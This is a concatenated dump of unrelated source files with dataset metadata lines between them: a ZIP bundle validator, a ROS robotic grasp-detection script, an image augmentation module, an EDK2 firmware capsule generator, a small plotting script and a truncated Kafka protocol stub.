unzipRecursively(subfile, subdirectory)
return
def zipFileIsGood(filePath):
"""
Function to test if a ZIP file is good or bad
@param filePath the zip file to be tested
@return True if the ZIP file is good. False otherwise.
"""
ret = True
try:
the_zip_file = zipfile.ZipFile(filePath)
badFile = the_zip_file.testzip()
if badFile is not None:
ret = False
else:
ret = True
except:
ret = False
return ret
def verifyZipFile(zipDirectory, nameOfBundle):
"""
Function to verify if an uploaded bundle is:
1) a valid zip file
2) follows IBM defined structure
@param zipDirectory where the bundle ZIP is located
@param nameOfBundle name of the bundle ZIP file
"""
print ('Validating bundle structure...')
bundleIsGood = True
bundleZip = os.path.join(zipDirectory, nameOfBundle)
if zipFileIsGood(bundleZip):
try:
# copy bundle into new working directory -----------------------------------------------------------
directoryToUnzipTo = os.path.join(zipDirectory, "temp")
if not os.path.exists(directoryToUnzipTo):
os.makedirs(directoryToUnzipTo)
shutil.copy(bundleZip, os.path.join(directoryToUnzipTo, nameOfBundle))
# unzip the bundle ----------------------------------------------------------------------------------
unzipRecursively(os.path.join(directoryToUnzipTo, nameOfBundle), os.path.join(directoryToUnzipTo, os.path.splitext(nameOfBundle)[0]))
# verify structure of bundle ------------------------------------------------------------------------
# check package stucture
expectedPackageStructure = openJSONfile(os.path.join(zipDirectory, "bundle-definition.json"))
actualBundleStructure = directoryToJSON(directoryToUnzipTo) # convert the unzipped directory to JSON file
bundleIsGood = verifyBundleStructure(expectedPackageStructure, actualBundleStructure, "")
if not bundleIsGood:
addToErrorMessages("The uploaded bundle does not meet predefined structure. Could not proceed with deployment.")
# clean up unzipped stuff and package structure Json -------------------------------------------------
shutil.rmtree(directoryToUnzipTo)
except:
addToErrorMessages("Exception occurred while verifying bundle structure. Could not proceed with deployment.")
bundleIsGood = False
else:
bundleIsGood = False
addToErrorMessages("The uploaded bundle could not be unzipped. Could not proceed with deployment.")
# out put report value , join all the messages together
print ("report=[" + ". ".join(str(x) for x in errorMessages) + "]")
return bundleIsGood
| 2.515625 | 3 |
src/static_grasp_kt.py | ivalab/GraspKpNet | 16 | 3489 | <filename>src/static_grasp_kt.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import _init_paths
import os
import json
import cv2
import cv2.aruco as aruco
import numpy as np
import sys
import rospy
from std_msgs.msg import Bool
from std_msgs.msg import Float64MultiArray
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
import message_filters
import torch
from external.nms import soft_nms
from opts import opts
from logger import Logger
from utils.utils import AverageMeter
from datasets.dataset_factory import dataset_factory
from detectors.detector_factory import detector_factory
# transformation from the robot base to aruco tag
M_BL = np.array([[1., 0., 0., 0.30000],
[0., 1., 0., 0.32000],
[0., 0., 1., -0.0450],
[0., 0., 0., 1.00000]])
# default transformation from the camera to aruco tag
default_M_CL = np.array([[-0.07134498, -0.99639369, 0.0459293, -0.13825178],
[-0.8045912, 0.03027403, -0.59305689, 0.08434352],
[ 0.58952768, -0.07926594, -0.8038495, 0.66103522],
[ 0., 0., 0., 1. ]]
)
# camera intrinsic matrix of Realsense D435
cameraMatrix = np.array([[607.47165, 0.0, 325.90064],
[0.0, 606.30420, 240.91934],
[0.0, 0.0, 1.0]])
# distortion of Realsense D435
distCoeffs = np.array([0.08847, -0.04283, 0.00134, -0.00102, 0.0])
# initialize GKNet Detector
opt = opts().parse()
Dataset = dataset_factory[opt.dataset]
opt = opts().update_dataset_info_and_set_heads(opt, Dataset)
print(opt)
Detector = detector_factory[opt.task]
detector = Detector(opt)
# Publisher of perception result
pub_res = rospy.Publisher('/result', Float64MultiArray, queue_size=10)
def get_M_CL_info(gray, image_init, visualize=False):
# parameters
markerLength_CL = 0.093
aruco_dict_CL = aruco.Dictionary_get(aruco.DICT_ARUCO_ORIGINAL)
# aruco_dict_CL = aruco.Dictionary_get(aruco.DICT_6X6_250)
parameters = aruco.DetectorParameters_create()
corners_CL, ids_CL, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict_CL, parameters=parameters)
# for the first frame, it may contain nothing
if ids_CL is None:
return default_M_CL, None
rvec_CL, tvec_CL, _objPoints_CL = aruco.estimatePoseSingleMarkers(corners_CL[0], markerLength_CL,
cameraMatrix, distCoeffs)
dst_CL, jacobian_CL = cv2.Rodrigues(rvec_CL)
M_CL = np.zeros((4, 4))
M_CL[:3, :3] = dst_CL
M_CL[:3, 3] = tvec_CL
M_CL[3, :] = np.array([0, 0, 0, 1])
if visualize:
# print('aruco is located at mean position (%d, %d)' %(mean_x ,mean_y))
aruco.drawAxis(image_init, cameraMatrix, distCoeffs, rvec_CL, tvec_CL, markerLength_CL)
return M_CL, corners_CL[0][0, :, :]
def aruco_tag_remove(rgb_image, corners):
img_out = rgb_image.copy()
    # find the top-left and bottom-right corners by tracking the extremes of x + y
    min_sum = sys.maxsize
    max_sum = -sys.maxsize
    tl_pxl = None
    br_pxl = None
    for corner in corners:
        if corner[0] + corner[1] < min_sum:
            min_sum = corner[0] + corner[1]
            tl_pxl = [int(corner[0]), int(corner[1])]
        if corner[0] + corner[1] > max_sum:
            max_sum = corner[0] + corner[1]
            br_pxl = [int(corner[0]), int(corner[1])]
    # get the replacement pixel value just outside the tag (numpy indexing is [row, col], i.e. [y, x])
    rep_color = img_out[tl_pxl[1] - 10, tl_pxl[0] - 10, :]
for h in range(tl_pxl[1] - 45, br_pxl[1] + 46):
for w in range(tl_pxl[0] - 45, br_pxl[0] + 46):
img_out[h, w, :] = rep_color
return img_out
def project(pixel, depth_image, M_CL, M_BL, cameraMatrix):
'''
project 2d pixel on the image to 3d by depth info
:param pixel: x, y
:param M_CL: trans from camera to aruco tag
:param cameraMatrix: camera intrinsic matrix
:param depth_image: depth image
:param depth_scale: depth scale that trans raw data to mm
:return:
q_B: 3d coordinate of pixel with respect to base frame
'''
depth = depth_image[pixel[1], pixel[0]]
    # if the depth of the detected pixel is 0, search an expanding square
    # neighborhood around it until a non-zero depth is found
nei_range = 1
while depth == 0:
for delta_x in range(-nei_range, nei_range + 1):
for delta_y in range(-nei_range, nei_range + 1):
nei = [pixel[0] + delta_x, pixel[1] + delta_y]
depth = depth_image[nei[1], nei[0]]
if depth != 0:
break
if depth != 0:
break
nei_range += 1
pxl = np.linalg.inv(cameraMatrix).dot(
np.array([pixel[0] * depth, pixel[1] * depth, depth]))
q_C = np.array([pxl[0], pxl[1], pxl[2], 1])
q_L = np.linalg.inv(M_CL).dot(q_C)
q_B = M_BL.dot(q_L)
return q_B
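# Back-projection sketch (restating the code above, values are illustrative only):
# for pixel (u, v) with depth d, the camera-frame point is
#     q_C = inv(cameraMatrix) @ [u*d, v*d, d]  (homogenised with a trailing 1),
# which is then mapped via inv(M_CL) and M_BL, e.g.
#     q_B = project((320, 240), depth_image, M_CL, M_BL, cameraMatrix)
# returns a homogeneous [x, y, z, 1] point expressed in the robot base frame.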
def pre_process(rgb_img, depth_img):
inp_image = rgb_img
inp_image[:, :, 0] = depth_img
inp_image = cv2.resize(inp_image, (256, 256))
return inp_image
def kinect_rgbd_callback(rgb_data, depth_data):
"""
Save raw RGB and depth input from Kinect V1
:param rgb_data: RGB image
:param depth_data: raw depth image
:return: None
"""
try:
cv_rgb = cv_bridge.imgmsg_to_cv2(rgb_data, "bgr8")
cv_depth = cv_bridge.imgmsg_to_cv2(depth_data, "32FC1")
cv_rgb_arr = np.array(cv_rgb, dtype=np.uint8)
cv_depth_arr = np.array(cv_depth, dtype=np.float32)
# cv_depth_arr = np.nan_to_num(cv_depth_arr)
cv2.imshow("Depth", cv_depth)
cv2.imshow("RGB", cv_rgb)
img = cv_rgb_arr.copy()
depth_raw = cv_depth_arr.copy()
gray = img.astype(np.uint8)
depth = (depth_raw * 1000).astype(np.uint8)
# get the current transformation from the camera to aruco tag
M_CL, corners = get_M_CL_info(gray, img, False)
# remove aruco tag from input image to avoid mis-detection
if corners is not None:
img_wo_at = aruco_tag_remove(img, corners)
# replace blue channel with the depth channel
inp_image = pre_process(img_wo_at, depth)
# pass the image into the network
ret = detector.run(inp_image[:, :, :])
ret = ret["results"]
loc_ori = KpsToGrasppose(ret, img, depth_raw, M_CL, M_BL, cameraMatrix)
pub_res.publish(loc_ori)
except CvBridgeError as e:
print(e)
def isWithinRange(pxl, w, h):
x, y = pxl[:]
return w/12. <= x <= 11*w/12 and h/12. <= y <= 11*h/12
def KpsToGrasppose(net_output, rgb_img, depth_map, M_CL, M_BL, cameraMatrix, visualize=True):
kps_pr = []
for category_id, preds in net_output.items():
if len(preds) == 0:
continue
for pred in preds:
kps = pred[:4]
score = pred[-1]
kps_pr.append([kps[0], kps[1], kps[2], kps[3], score])
# no detection
if len(kps_pr) == 0:
return [0, 0, 0, 0]
# sort by the confidence score
kps_pr = sorted(kps_pr, key=lambda x: x[-1], reverse=True)
# select the top 1 grasp prediction within the workspace
res = None
for kp_pr in kps_pr:
f_w, f_h = 640. / 512., 480. / 512.
kp_lm = (int(kp_pr[0] * f_w), int(kp_pr[1] * f_h))
kp_rm = (int(kp_pr[2] * f_w), int(kp_pr[3] * f_h))
if isWithinRange(kp_lm, 640, 480) and isWithinRange(kp_rm, 640, 480):
res = kp_pr
break
if res is None:
return [0, 0, 0, 0]
f_w, f_h = 640./512., 480./512.
kp_lm = (int(res[0]*f_w), int(res[1]*f_h))
kp_rm = (int(res[2]*f_w), int(res[3]*f_h))
center = (int((kp_lm[0]+kp_rm[0])/2), int((kp_lm[1]+kp_rm[1])/2))
kp_lm_3d = project(kp_lm, depth_map, M_CL, M_BL, cameraMatrix)
kp_rm_3d = project(kp_rm, depth_map, M_CL, M_BL, cameraMatrix)
center_3d = project(center, depth_map, M_CL, M_BL, cameraMatrix)
orientation = np.arctan2(kp_rm_3d[1] - kp_lm_3d[1], kp_rm_3d[0] - kp_lm_3d[0])
# motor 7 is clockwise
if orientation > np.pi / 2:
orientation = np.pi - orientation
elif orientation < -np.pi / 2:
orientation = -np.pi - orientation
else:
orientation = -orientation
# compute the open width
dist = np.linalg.norm(kp_lm_3d[:2] - kp_rm_3d[:2])
# draw arrow for left-middle and right-middle key-points
lm_ep = (int(kp_lm[0] + (kp_rm[0] - kp_lm[0]) / 5.), int(kp_lm[1] + (kp_rm[1] - kp_lm[1]) / 5.))
rm_ep = (int(kp_rm[0] + (kp_lm[0] - kp_rm[0]) / 5.), int(kp_rm[1] + (kp_lm[1] - kp_rm[1]) / 5.))
rgb_img = cv2.arrowedLine(rgb_img, kp_lm, lm_ep, (0, 0, 0), 2)
rgb_img = cv2.arrowedLine(rgb_img, kp_rm, rm_ep, (0, 0, 0), 2)
# draw left-middle, right-middle and center key-points
rgb_img = cv2.circle(rgb_img, (int(kp_lm[0]), int(kp_lm[1])), 2, (0, 0, 255), 2)
rgb_img = cv2.circle(rgb_img, (int(kp_rm[0]), int(kp_rm[1])), 2, (0, 0, 255), 2)
rgb_img = cv2.circle(rgb_img, (int(center[0]), int(center[1])), 2, (0, 0, 255), 2)
if visualize:
cv2.namedWindow('visual', cv2.WINDOW_AUTOSIZE)
cv2.imshow('visual', rgb_img)
return [center_3d[0], center_3d[1], center_3d[2], orientation, dist]
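# Note: KpsToGrasppose() returns [x, y, z, theta, width] -- the grasp centre in the
# base frame (via project()), the gripper orientation in radians, and the planar
# distance between the left/right keypoints used as the gripper opening width
# (units follow the scale of the depth image). This list is the payload published
# on the /result topic in kinect_rgbd_callback().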
if __name__ == '__main__':
# initialize ros node
rospy.init_node("Static_grasping")
# Bridge to convert ROS Image type to OpenCV Image type
cv_bridge = CvBridge()
cv2.WITH_QT = False
# Get camera calibration parameters
cam_param = rospy.wait_for_message('/camera/rgb/camera_info', CameraInfo, timeout=None)
# Subscribe to rgb and depth channel
image_sub = message_filters.Subscriber("/camera/rgb/image_rect_color", Image)
depth_sub = message_filters.Subscriber("/camera/depth_registered/image", Image)
ts = message_filters.ApproximateTimeSynchronizer([image_sub, depth_sub], 1, 0.1)
ts.registerCallback(kinect_rgbd_callback)
rospy.spin() | 1.695313 | 2 |
source/utils/augmentations.py | dovietchinh/multi-task-classification | 0 | 3490 | <reponame>dovietchinh/multi-task-classification<filename>source/utils/augmentations.py<gh_stars>0
import numpy as np
import cv2
import random
def preprocess(img,img_size,padding=True):
"""[summary]
Args:
img (np.ndarray): images
img_size (int,list,tuple): target size. eg: 224 , (224,224) or [224,224]
padding (bool): padding img before resize. Prevent from image distortion. Defaults to True.
Returns:
images (np.ndarray): images in target size
"""
if padding:
height,width,_ = img.shape
delta = height - width
if delta > 0:
img = np.pad(img,[[0,0],[delta//2,delta//2],[0,0]], mode='constant',constant_values =255)
else:
img = np.pad(img,[[-delta//2,-delta//2],[0,0],[0,0]], mode='constant',constant_values =255)
if isinstance(img_size,int):
img_size = (img_size,img_size)
return cv2.resize(img,img_size)
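# Minimal usage sketch (the image path is a placeholder, not part of this module):
#     img = cv2.imread('example.jpg')                       # any HxWx3 image
#     img_224 = preprocess(img, 224)                        # padded to square, then resized to 224x224
#     img_raw = preprocess(img, (224, 224), padding=False)  # plain resize, may distort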
class RandAugment:
def __init__(self, augment_params):
self.num_layers = augment_params['num_layers']
self.AUGMENT_FUNCTION = {
'fliplr' : RandAugment.augment_fliplr if augment_params.get('fliplr') else None,
'augment_hsv' : RandAugment.augment_hsv if augment_params.get('augment_hsv') else None,
'hist_equalize' : RandAugment.hist_equalize if augment_params.get('hist_equalize') else None,
'solarize' : RandAugment.solarize if augment_params.get('solarize') else None,
'posterize': RandAugment.posterize if augment_params.get('posterize') else None,
'adjust_brightness': RandAugment.adjust_brightness if augment_params.get('adjust_brightness') else None,
'invert' : RandAugment.invert if augment_params.get('invert') else None,
'contrast': RandAugment.contrast if augment_params.get('contrast') else None,
'shearX' : RandAugment.shear_x if augment_params.get('shearX') else None,
'shearY' : RandAugment.shear_y if augment_params.get('shearY') else None,
'translateX' : RandAugment.translate_x if augment_params.get('translateX') else None,
'translateY' : RandAugment.translate_y if augment_params.get('translateY') else None,
'sharpness' : RandAugment.sharpness if augment_params.get('sharpness') else None,
'cutout' : RandAugment.cutout if augment_params.get('cutout') else None,
'rotate' : RandAugment.rotate if augment_params.get('rotate') else None,
'cut_25_left' : RandAugment.cut_25_left if augment_params.get('cut_25_left') else None,
'cut_25_right': RandAugment.cut_25_right if augment_params.get('cut_25_right') else None,
'cut_25_above': RandAugment.cut_25_above if augment_params.get('cut_25_above') else None,
'cut_25_under': RandAugment.cut_25_under if augment_params.get('cut_25_under') else None,
# 'random_crop':random_crop
}
self.ARGS_LIMIT = {
'fliplr' : augment_params.get('fliplr'),
'augment_hsv': augment_params.get('augment_hsv'),
'hist_equalize' : augment_params.get('hist_equalize'),
'solarize' : augment_params.get('solarize'),
'posterize': augment_params.get('posterize'),
'adjust_brightness': augment_params.get('adjust_brightness'),
'invert' : augment_params.get('invert'),
'contrast': augment_params.get('contrast'),
'shearX' : augment_params.get('shearX'),
'shearY' : augment_params.get('shearY'),
'translateX' : augment_params.get('translateX'),
'translateY' : augment_params.get('translateY'),
'sharpness' : augment_params.get('sharpness'),
'cutout' : augment_params.get('cutout'),
'rotate' : augment_params.get('rotate'),
'cut_25_left' : augment_params.get('cut_25_left'),
'cut_25_right': augment_params.get('cut_25_right'),
'cut_25_above': augment_params.get('cut_25_above'),
'cut_25_under': augment_params.get('cut_25_under')
# 'random_crop':random_crop
}
self.policy = list(k for k,v in self.AUGMENT_FUNCTION.items() if v)
# print(self.policy)
def mixup(img1,img2,factor):
img = img1.astype('float')* factor + img2.astype('float') * (1-factor)
img = np.clip(img, 0,255)
img = img.astype('uint8')
return img
def augment_fliplr(img,level):
if random.random() < level:
return np.fliplr(img)
return img
def augment_hsv(im, level=None, hgain=0.015, sgain=0.7, vgain=0.4):
im = im.copy()
# HSV color-space augmentation
if hgain or sgain or vgain:
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(im, cv2.COLOR_BGR2HSV))
dtype = im.dtype # uint8
x = np.arange(0, 256, dtype=r.dtype)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
im_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val)))
cv2.cvtColor(im_hsv, cv2.COLOR_HSV2BGR, dst=im) # no return needed
return im_hsv
def hist_equalize(im, level=None,clahe=True, bgr=True):
im = im.copy()
# Equalize histogram on BGR image 'im' with im.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def solarize(image, level=128):
threshold = level
image = image.copy()
# For each pixel in the image, select the pixel
# if the value is less than the threshold.
# Otherwise, subtract 255 from the pixel.
return np.where(image <= threshold, image, 255 - image)
    def posterize(img, level=3):
        bits = level
        shift = 8 - bits
        # standard posterize: keep only the top `bits` bits of each channel by
        # shifting right to drop the low bits, then shifting left to restore scale
        img = np.right_shift(img, shift)
        img = np.left_shift(img, shift)
        return img.astype('uint8')
def adjust_brightness(img,level=0.5):
factor = level
degenerate = np.zeros(img.shape,dtype='uint8')
img = RandAugment.mixup(img,degenerate,factor)
return img
def invert(img,level=None):
return 255-img
def contrast(img,factor=0.5):
degenerate = cv2.cvtColor(cv2.cvtColor(img, cv2.COLOR_BGR2GRAY), cv2.COLOR_GRAY2BGR)
return RandAugment.mixup(img,degenerate,factor)
def shear_x(img,level=0.4,mode='reflect'):
M = np.array([[1, level, 0],
[0, 1 , 0],
[0, 0 , 1]],dtype='float')
height,width,_ = img.shape
option_mode ={
'reflect' : cv2.BORDER_REPLICATE,
'constant' : cv2.BORDER_CONSTANT
}
mode = option_mode[mode]
sheared_img = cv2.warpPerspective(img, M, (width, height), borderMode=mode)
return sheared_img
def shear_y(img,level=0.4,mode='reflect'):
M = np.array([[1, 0 , 0],
[level, 1 , 0],
[0, 0 , 1]],dtype='float')
height,width,_ = img.shape
option_mode ={
'reflect' : cv2.BORDER_REPLICATE,
'constant' : cv2.BORDER_CONSTANT
}
mode = option_mode[mode]
sheared_img = cv2.warpPerspective(img, M, (width, height), borderMode=mode)
return sheared_img
    def translate_x(img,level,mode='reflect'):
        height,width,_ = img.shape
        option_mode ={
            'reflect' : cv2.BORDER_REPLICATE,
            'constant' : cv2.BORDER_CONSTANT
        }
        mode = option_mode[mode]
        translate_pixel = int(width * level)
        # pure horizontal translation (no shear term)
        M = np.array([[1, 0, translate_pixel],
                      [0, 1, 0],
                      [0, 0, 1]], dtype='float')
        translate_img = cv2.warpPerspective(img, M, (width, height), borderMode=mode)
        return translate_img
    def translate_y(img,level,mode='reflect'):
        height,width,_ = img.shape
        option_mode ={
            'reflect' : cv2.BORDER_REPLICATE,
            'constant' : cv2.BORDER_CONSTANT
        }
        mode = option_mode[mode]
        translate_pixel = int(height * level)
        # pure vertical translation (no shear term)
        M = np.array([[1, 0, 0],
                      [0, 1, translate_pixel],
                      [0, 0, 1]], dtype='float')
        translate_img = cv2.warpPerspective(img, M, (width, height), borderMode=mode)
        return translate_img
    def sharpness(img, level=0.5):
        # blend the image with a smoothed version of itself (same 3x3 kernel as PIL's
        # Sharpness op); level=1 keeps the original, level=0 returns the smoothed image
        kernel = np.array([[1, 1, 1],
                           [1, 5, 1],
                           [1, 1, 1]], dtype='float32') / 13.
        degenerate = cv2.filter2D(img, -1, kernel)
        return RandAugment.mixup(img, degenerate, level)
def cutout(img,level,**kwargs):
img = img.copy()
height,width ,_ = img.shape
padding_size = int(height*level),int(width*level)
value = kwargs.get('value')
cordinate_h = np.random.randint(0,height-padding_size[0])
cordinate_w = np.random.randint(0,width-padding_size[1])
img[cordinate_h:cordinate_h+padding_size[0],cordinate_w:cordinate_w+padding_size[1],:] = 255
return img
def rotate(image, level=45, center = None, scale = 1.0):
angle=level
(h, w) = image.shape[:2]
if center is None:
center = (w / 2, h / 2)
# Perform the rotation
M = cv2.getRotationMatrix2D(center, angle, scale)
rotated = cv2.warpAffine(image, M, (w, h),borderMode=cv2.BORDER_REPLICATE)
return rotated
def cut_25_under(img,level=0.25):
ratio = level
height,width,_ = img.shape
new_height = int((1-ratio)*height)
img_ = img[:new_height,:,:]
height,width,_ = img_.shape
if height > width :
img2 = np.pad(img_,[[0,0],[(height-width)//2,(height-width)//2],[0,0]],mode='constant',constant_values=255)
else:
img2 = np.pad(img_,[[(width-height)//2,(width-height)//2],[0,0],[0,0]],mode='constant',constant_values=255)
img2 = cv2.resize(img2,(224,224))
return img2
def cut_25_above(img,level=0.25):
ratio = level
height,width,_ = img.shape
new_height = int(ratio*height)
img_ = img[new_height:,:,:]
height,width,_ = img_.shape
if height > width :
img2 = np.pad(img_,[[0,0],[(height-width)//2,(height-width)//2],[0,0]],mode='constant',constant_values=255)
else:
img2 = np.pad(img_,[[(width-height)//2,(width-height)//2],[0,0],[0,0]],mode='constant',constant_values=255)
img2 = cv2.resize(img2,(224,224))
return img2
def cut_25_right(img,level=0.25):
ratio = level
height,width,_ = img.shape
new_width = int((1-ratio)*width)
img_ = img[:,:new_width,:]
height,width,_ = img_.shape
if height > width :
img2 = np.pad(img_,[[0,0],[(height-width)//2,(height-width)//2],[0,0]],mode='constant',constant_values=255)
else:
img2 = np.pad(img_,[[(width-height)//2,(width-height)//2],[0,0],[0,0]],mode='constant',constant_values=255)
img2 = cv2.resize(img2,(224,224))
return img2
def cut_25_left(img,level=0.25):
ratio = level
height,width,_ = img.shape
new_width = int(ratio*width)
img_ = img[:,new_width:,:]
height,width,_ = img_.shape
if height > width :
img2 = np.pad(img_,[[0,0],[(height-width)//2,(height-width)//2],[0,0]],mode='constant',constant_values=255)
else:
img2 = np.pad(img_,[[(width-height)//2,(width-height)//2],[0,0],[0,0]],mode='constant',constant_values=255)
img2 = cv2.resize(img2,(224,224))
return img2
def __call__(self,img):
augmenters = random.choices(self.policy, k=self.num_layers)
for augmenter in augmenters:
level = random.random()
# try:
min_arg,max_arg = self.ARGS_LIMIT[augmenter]
level = min_arg + (max_arg - min_arg) * level
img = self.AUGMENT_FUNCTION[augmenter](img,level=level)
# except:
# print(augmenter)
return img
def augmentation_test():
img_org = cv2.imread('test.jpg')
import yaml
augment_params = yaml.safe_load(open('config/default/train_config.yaml')).get('augment_params')
augmenter = RandAugment(augment_params=augment_params)#(num_layers=1)
for _ in range(10000):
img_aug = augmenter(img_org)
img_pad = preprocess(img_aug,224)
# cv2.imshow('a',img_org)
# cv2.imshow('b',img_aug)
# cv2.imshow('c',img_pad)
# if cv2.waitKey(0)==ord('q'):
# exit()
if __name__ =='__main__':
augmentation_test() | 2.640625 | 3 |
BaseTools/Source/Python/GenFds/CapsuleData.py | James992927108/uEFI_Edk2_Practice | 6 | 3491 | ## @file
# generate capsule
#
# Copyright (c) 2007-2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Ffs
from GenFdsGlobalVariable import GenFdsGlobalVariable
import StringIO
from struct import pack
import os
from Common.Misc import SaveFileOnChange
import uuid
## base class for capsule data
#
#
class CapsuleData:
## The constructor
#
# @param self The object pointer
def __init__(self):
pass
## generate capsule data
#
# @param self The object pointer
def GenCapsuleSubItem(self):
pass
## FFS class for capsule data
#
#
class CapsuleFfs (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FvName = None
## generate FFS capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
FfsFile = self.Ffs.GenFfs()
return FfsFile
## FV class for capsule data
#
#
class CapsuleFv (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FvName = None
self.CapsuleName = None
## generate FV capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
if self.FvName.find('.fv') == -1:
if self.FvName.upper() in GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys():
FvObj = GenFdsGlobalVariable.FdfParser.Profile.FvDict.get(self.FvName.upper())
FdBuffer = StringIO.StringIO('')
FvObj.CapsuleName = self.CapsuleName
FvFile = FvObj.AddToBuffer(FdBuffer)
FvObj.CapsuleName = None
FdBuffer.close()
return FvFile
else:
FvFile = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FvName)
return FvFile
## FD class for capsule data
#
#
class CapsuleFd (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FdName = None
self.CapsuleName = None
## generate FD capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
if self.FdName.find('.fd') == -1:
if self.FdName.upper() in GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys():
FdObj = GenFdsGlobalVariable.FdfParser.Profile.FdDict.get(self.FdName.upper())
FdFile = FdObj.GenFd()
return FdFile
else:
FdFile = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FdName)
return FdFile
## AnyFile class for capsule data
#
#
class CapsuleAnyFile (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FileName = None
## generate AnyFile capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
return self.FileName
## Afile class for capsule data
#
#
class CapsuleAfile (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FileName = None
## generate Afile capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
return self.FileName
class CapsulePayload(CapsuleData):
'''Generate payload file, the header is defined below:
#pragma pack(1)
typedef struct {
UINT32 Version;
EFI_GUID UpdateImageTypeId;
UINT8 UpdateImageIndex;
UINT8 reserved_bytes[3];
UINT32 UpdateImageSize;
UINT32 UpdateVendorCodeSize;
UINT64 UpdateHardwareInstance; //Introduced in v2
} EFI_FIRMWARE_MANAGEMENT_CAPSULE_IMAGE_HEADER;
'''
def __init__(self):
self.UiName = None
self.Version = None
self.ImageTypeId = None
self.ImageIndex = None
self.HardwareInstance = None
self.ImageFile = []
self.VendorCodeFile = []
self.Certificate_Guid = None
self.MonotonicCount = None
self.Existed = False
self.Buffer = None
def GenCapsuleSubItem(self, AuthData=[]):
if not self.Version:
self.Version = '0x00000002'
if not self.ImageIndex:
self.ImageIndex = '0x1'
if not self.HardwareInstance:
self.HardwareInstance = '0x0'
ImageFileSize = os.path.getsize(self.ImageFile)
if AuthData:
# the ImageFileSize need include the full authenticated info size. From first bytes of MonotonicCount to last bytes of certificate.
# the 32 bit is the MonotonicCount, dwLength, wRevision, wCertificateType and CertType
ImageFileSize += 32
VendorFileSize = 0
if self.VendorCodeFile:
VendorFileSize = os.path.getsize(self.VendorCodeFile)
#
# Fill structure
#
Guid = self.ImageTypeId.split('-')
Buffer = pack('=ILHHBBBBBBBBBBBBIIQ',
int(self.Version,16),
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16),
int(self.ImageIndex, 16),
0,
0,
0,
ImageFileSize,
VendorFileSize,
int(self.HardwareInstance, 16)
)
if AuthData:
Buffer += pack('QIHH', AuthData[0], AuthData[1], AuthData[2], AuthData[3])
Buffer += uuid.UUID(AuthData[4]).get_bytes_le()
#
# Append file content to the structure
#
ImageFile = open(self.ImageFile, 'rb')
Buffer += ImageFile.read()
ImageFile.close()
if self.VendorCodeFile:
VendorFile = open(self.VendorCodeFile, 'rb')
Buffer += VendorFile.read()
VendorFile.close()
self.Existed = True
return Buffer
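# Layout sketch of the '=ILHHBBBBBBBBBBBBIIQ' struct packed above (little-endian,
# no implicit padding): 4-byte Version, 16-byte UpdateImageTypeId GUID (4+2+2+8 bytes),
# 1-byte UpdateImageIndex, 3 reserved bytes, 4-byte UpdateImageSize, 4-byte
# UpdateVendorCodeSize and 8-byte UpdateHardwareInstance -- matching the
# EFI_FIRMWARE_MANAGEMENT_CAPSULE_IMAGE_HEADER declared in the class docstring.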
| 2.25 | 2 |
CalculatingPi/pi_linear_plot.py | davidmallasen/Hello_MPI | 0 | 3492 | import matplotlib.pyplot as plt
import numpy as np
# Read data
size = []
time = []
with open("pi_linear.txt") as file:
for line in file.readlines():
x, y = line.split(',')
size.append(int(x.strip()))
time.append(float(y.strip()))
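# Assumed pi_linear.txt format (inferred from the parsing above, one measurement per line):
#     <num_processes>, <elapsed_seconds>
# e.g. "4, 1.2345"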
# Plot data
fig, ax = plt.subplots()
ax.plot(size, time)
ax.set(xlabel='Num. processes', ylabel='Time (s)',
title='Pi linear')
#ax.grid()
fig.savefig("pi_linear.png")
plt.show()
| 2.953125 | 3 |
esque_wire/protocol/structs/api/elect_preferred_leaders_response.py | real-digital/esque-wire | 0 | 3493 | <gh_stars>0
from typing import ClassVar, List, Optional
